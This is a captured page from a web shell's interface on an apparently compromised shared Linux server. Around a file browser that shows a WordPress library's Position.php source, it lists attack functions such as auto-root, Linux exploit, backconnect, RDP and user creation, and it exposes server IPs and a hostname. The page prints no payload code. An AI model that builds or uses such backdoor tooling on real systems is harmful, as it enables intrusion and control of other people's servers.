Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
mck89 /
peast /
lib /
Peast /
Syntax /
[ HOME SHELL ]
Name
Size
Permission
Action
ES2015
[ DIR ]
drwxr-xr-x
ES2016
[ DIR ]
drwxr-xr-x
ES2017
[ DIR ]
drwxr-xr-x
ES2018
[ DIR ]
drwxr-xr-x
ES2019
[ DIR ]
drwxr-xr-x
ES2020
[ DIR ]
drwxr-xr-x
ES2021
[ DIR ]
drwxr-xr-x
ES2022
[ DIR ]
drwxr-xr-x
ES2023
[ DIR ]
drwxr-xr-x
ES2024
[ DIR ]
drwxr-xr-x
ES2025
[ DIR ]
drwxr-xr-x
JSX
[ DIR ]
drwxr-xr-x
Node
[ DIR ]
drwxr-xr-x
CommentsRegistry.php
10.15
KB
-rw-r--r--
EncodingException.php
503
B
-rw-r--r--
EventsEmitter.php
1.52
KB
-rw-r--r--
Exception.php
1.01
KB
-rw-r--r--
Features.php
3.17
KB
-rw-r--r--
LSM.php
4.46
KB
-rw-r--r--
Parser.php
132.71
KB
-rw-r--r--
ParserAbstract.php
9.09
KB
-rw-r--r--
Position.php
1.75
KB
-rw-r--r--
Scanner.php
56.98
KB
-rw-r--r--
SourceLocation.php
1.67
KB
-rw-r--r--
Token.php
3.69
KB
-rw-r--r--
Utils.php
9.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Position.php
<?php /** * This file is part of the Peast package * * (c) Marco Marchiò <marco.mm89@gmail.com> * * For the full copyright and license information refer to the LICENSE file * distributed with this source code */ namespace Peast\Syntax; /** * This class represents the position in the source code. * * @author Marco Marchiò <marco.mm89@gmail.com> */ class Position implements \JSONSerializable { /** * Source line * * @var int */ protected $line; /** * Source column * * @var int */ protected $column; /** * Source index * * @var int */ protected $index; /** * Class constructor * * @param int $line Source line * @param int $column Source column * @param int $index Source index */ function __construct($line, $column, $index) { $this->line = $line; $this->column = $column; $this->index = $index; } /** * Returns the source line * * @return int */ public function getLine() { return $this->line; } /** * Returns the source column * * @return int */ public function getColumn() { return $this->column; } /** * Returns the source index * * @return int */ public function getIndex() { return $this->index; } /** * Returns a serializable version of the object * * @return array */ #[\ReturnTypeWillChange] public function jsonSerialize() { return array( "line" => $this->getLine(), "column" => $this->getColumn(), "index" => $this->getIndex() ); } }
Close